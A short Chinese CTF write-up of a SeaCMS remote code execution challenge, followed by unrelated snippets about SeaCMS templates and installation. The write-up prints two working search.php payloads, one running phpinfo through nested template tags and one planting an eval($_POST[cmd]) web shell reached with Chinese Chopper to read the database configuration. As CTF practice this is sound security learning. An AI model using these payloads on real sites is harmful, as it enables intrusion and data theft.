海洋cmsi春秋——“百度杯”CTF比赛 九月场——Test(海洋cms / seacms 任意代码执行漏洞)
打开发现是海洋cms,那就搜索相关漏洞 找到一篇介绍海洋cms的命令执行漏洞的文章:https://www.jianshu.com/p/ebf156afda49直接利用其中给出的poc
/search.phpsearchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=ph&9[]=pinfo();可以执行系统命令
没找到flag,考虑可能在数据库中,想上传一句话,然后用菜刀查数据库来着,但是没有写文件的权限,手动查数据库感觉太麻烦,所以换个exp海洋cms v6.28命令执行漏洞 : https://www.uedbox.com/seacms-v628-0day/
/search.php?searchtype=5&tid=&area=eval($_POST@[cmd])菜刀直接连接找了好久终于找到数据库配置文件编辑该条shell配置如下 最后得到flag
更多文章
-
海洋cms模板标签大全(收藏级)
海洋cms以其免费开源、采集功能强大著称,吸引了越来越影视站长。那么在使用海洋cms过程中,模板标签是必须要掌握的。下面是整理的海洋cms模板标签大全,对于做站朋友,一定有用,赶快收藏起来吧!海洋cms模板标签目录00.相关必要说明 01.全局标签 02.自定义标签 03.if标签和嵌套if标签subif(支持php语句、多e
-
海洋cms模板更换及安装教程
很多刚使用海洋cms站长朋友,不知道如何更换模板及安装,下面就详细的图文教程,快来学习! 第一步,从免费海洋cms模板下载网站(http://www.dongliancnc.com),选择喜好的模板并下载,特别说明都是人工测试过的模板,保证使用哦。 第二步,将模板压缩包,上传文件到网站templets目录下
-
海洋cms海洋默认模板首页banner是更具什么来推荐生成的
用的是海洋的默认模板,请问各位老大, 首页banner是更具什么来推荐生成的,我试了把点击数量调大, 但是并不是都进入了首页的banner里,不知道是受什么影响的 解决方法: 每个模板都不一样,根据模板实际调用的内容来决定。 一般情况下是根据星级。 配合模板标签检查
-
海洋cms安装引导连不上数据库
使用虚拟主机安装的海洋cms,根据安装包内伪静态规则记载“** IIS和Apache的伪静态规则后台直接自动生成” 虚拟主机应使用Apache的伪静态且自动生成,但安装引导一直提示数据库连接失败,已查证数据库信息无误 解决方法: 数据库连接失败,肯定还是你的数据库信息填写有问题。找idc核实下
-
海洋cmscentos7宝塔自动采集报错
/www/server/cron/accbb9db7a4fb6706e8a35c927af770d: line 12: web_site: command not found /www/server/cron/accbb9db7a4fb6706e8a35c927af770d: line 15: